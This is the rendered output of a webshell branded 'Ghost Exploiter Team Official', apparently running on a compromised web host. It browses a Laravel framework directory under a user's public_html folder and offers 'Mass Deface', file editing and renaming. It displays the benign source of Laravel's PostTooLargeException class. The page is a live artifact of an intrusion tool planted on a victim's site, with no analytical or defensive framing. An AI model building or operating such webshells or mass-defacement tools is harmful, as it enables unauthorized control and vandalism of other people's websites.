webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Http
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
HttpResponseException.php
0.771KB
edt
ren
PostTooLargeException.php
0.582KB
edt
ren
ThrottleRequestsExcepti
...
0.617KB
edt
ren
<?php namespace Illuminate\Http\Exceptions; use Symfony\Component\HttpKernel\Exception\HttpException; use Throwable; class PostTooLargeException extends HttpException { /** * Create a new "post too large" exception instance. * * @param string $message * @param \Throwable|null $previous * @param array $headers * @param int $code * @return void */ public function __construct($message = '', Throwable $previous = null, array $headers = [], $code = 0) { parent::__construct(413, $message, $previous, $headers, $code); } }
<=Back
Liking